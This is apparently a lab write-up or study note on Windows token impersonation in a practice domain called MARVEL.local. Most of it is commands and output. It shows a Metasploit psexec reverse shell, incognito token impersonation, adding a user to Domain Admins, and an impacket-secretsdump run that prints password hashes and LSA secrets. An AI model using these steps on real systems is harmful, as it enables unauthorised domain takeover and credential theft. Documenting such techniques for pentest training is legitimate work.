# Token Impersonation ### **What are tokens?** * Temporary keys that allow you access to a system/network without having to provide credentials each time you access a file. Think cookies for computers. **Two types:** * **Delegate** – Created for logging into a machine or using Remote Desktop * **Impersonate** – “non-interactive” such as attaching a network drive or a domain logon script #### Example

We can sometimes also find admin tokens.

We can then use it to dump hashes

We can also add a new user to get more access

### Exploiting Tokens #### 1. Get a meterpreter shell We can use smb psexec to gain a terminal if we have credentials

``` msf6 exploit(windows/smb/psexec) > run [*] Started reverse TCP handler on 192.168.145.141:4444 [*] 192.168.145.139:445 - Connecting to the server... [*] 192.168.145.139:445 - Authenticating to 192.168.145.139:445|MARVEL.local as user 'fcastle'... [*] 192.168.145.139:445 - Selecting PowerShell target [*] 192.168.145.139:445 - Executing the payload... [+] 192.168.145.139:445 - Service start timed out, OK if running a command or non-service executable... [*] Sending stage (201798 bytes) to 192.168.145.139 [*] Meterpreter session 1 opened (192.168.145.141:4444 -> 192.168.145.139:64070) at 2025-05-21 05:13:13 -0400 meterpreter > ``` **User must have logged in to our target machine.** #### 2. Load INCOGNITIO module meterpreter has some commands that can be used to impersonate tokens. You need to load the incognitio module. ``` load incognito ``` You can type help and see the supported commands.

#### List tokens ``` meterpreter > list_tokens -u Delegation Tokens Available ======================================== Font Driver Host\UMFD-0 Font Driver Host\UMFD-1 MARVEL\fcastle NT AUTHORITY\LOCAL SERVICE NT AUTHORITY\NETWORK SERVICE NT AUTHORITY\SYSTEM Window Manager\DWM-1 Impersonation Tokens Available ======================================== No tokens available ``` We can also list groups ``` meterpreter > list_tokens -g Delegation Tokens Available ======================================== \ \Authentication authority asserted identity BUILTIN\Administrators BUILTIN\Users MARVEL\Domain Users NT AUTHORITY\Authenticated Users NT AUTHORITY\INTERACTIVE NT AUTHORITY\LOCAL SERVICE NT AUTHORITY\LogonSessionId_0_101431 NT AUTHORITY\LogonSessionId_0_103458 ``` ### Impersonate tokens ``` meterpreter > impersonate_token marvel\\fcastle [+] Delegation token available [+] Successfully impersonated user MARVEL\fcastle meterpreter > shell Process 7828 created. Channel 1 created. Microsoft Windows [Version 10.0.19045.2006] (c) Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami marvel\fcastle C:\Windows\system32> ``` If you have admin token, you can even impersonate it.

#### Adding a user We can even add a user. ``` C:\Windows\system32>net user /add hawkeye Password1@ /domain net user /add hawkeye Password1@ /domain The request will be processed at a domain controller for domain MARVEL.local. The command completed successfully. C:\Windows\system32>net group "Domain Admins" hawkeye /ADD /DOMAIN net group "Domain Admins" hawkeye /ADD /DOMAIN The request will be processed at a domain controller for domain MARVEL.local. The command completed successfully. C:\Windows\system32> ``` #### Secrets Dump Now we can use it to dump things. ``` ┌──(kali㉿kali)-[~] └─$ impacket-secretsdump 'MARVEL.local/hawkeye:Password1@@192.168.145.139' Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Service RemoteRegistry is in stopped state [*] Service RemoteRegistry is disabled, enabling it [*] Starting service RemoteRegistry [*] Target system bootKey: 0xec9be313e502a2aa71fd4e8e4c9999d5 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6578f05068adb3e4a16d3253bd46bacb::: frankcastle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b::: [*] Dumping cached domain logon information (domain/username:hash) MARVEL.LOCAL/fcastle:$DCC2$10240#fcastle#e6f48c2526bd594441d3da3723155f6f: (2025-05-21 09:14:56) MARVEL.LOCAL/Administrator:$DCC2$10240#Administrator#c7154f935b7d1ace4c1d72bd4fb7889c: (2025-05-21 09:26:34) [*] Dumping LSA Secrets [*] $MACHINE.ACC MARVEL\THEPUNISHER$:aes256-cts-hmac-sha1-96:6a98901004c69df5467cd869f4ea7c1f0e5f3d8848a9549a5aa9b7ba3b3150e4 MARVEL\THEPUNISHER$:aes128-cts-hmac-sha1-96:ec537eb458177012db5ab7997afd825b MARVEL\THEPUNISHER$:des-cbc-md5:cd4af415fb927af4 MARVEL\THEPUNISHER$:plain_password_hex:660056004b006300470078004000550048004f00570027007200250059002c002600720020006c00500024005e003a005900580058004e005d006700750041002c002d00590030004400640043002f0037007000480065004400660044005600670067005f00290068007a00570037006a002a003200330075003e00750066004400320064007100700035003600710059003d004f00580055005d0065003d0051002f0059006e00690029002f00590020002d006100270069002c003700550047003500570030005d0056002e00780074004e007a003900450071003f0072006e0045004200300058002c0028006f00 MARVEL\THEPUNISHER$:aad3b435b51404eeaad3b435b51404ee:b5458f32b6a10e8482ae7a582f776ab0::: [*] DPAPI_SYSTEM dpapi_machinekey:0x6174875d29cb646655e1dd49c2853691667f78f2 dpapi_userkey:0xa4d2daa834d71945360ce5b8ac5efcf2a02a9c28 [*] NL$KM 0000 09 9F C6 F6 60 EF 09 3E 30 CC 5B AA C7 AC 5A FB ....`..>0.[...Z. 0010 CA 61 47 50 2D 62 B1 36 D6 59 69 2F 82 CB 81 DE .aGP-b.6.Yi/.... 0020 D8 20 BF 99 BA 90 0C 47 10 9E 8E CB F5 01 E2 F0 . .....G........ 0030 0C 9C FC 1A BF AD 66 7B 03 11 DA A4 DF CD 60 63 ......f{......`c NL$KM:099fc6f660ef093e30cc5baac7ac5afbca6147502d62b136d659692f82cb81ded820bf99ba900c47109e8ecbf501e2f00c9cfc1abfad667b0311daa4dfcd6063 [*] Cleaning up... [*] Stopping service RemoteRegistry [*] Restoring the disabled state for service RemoteRegistry ```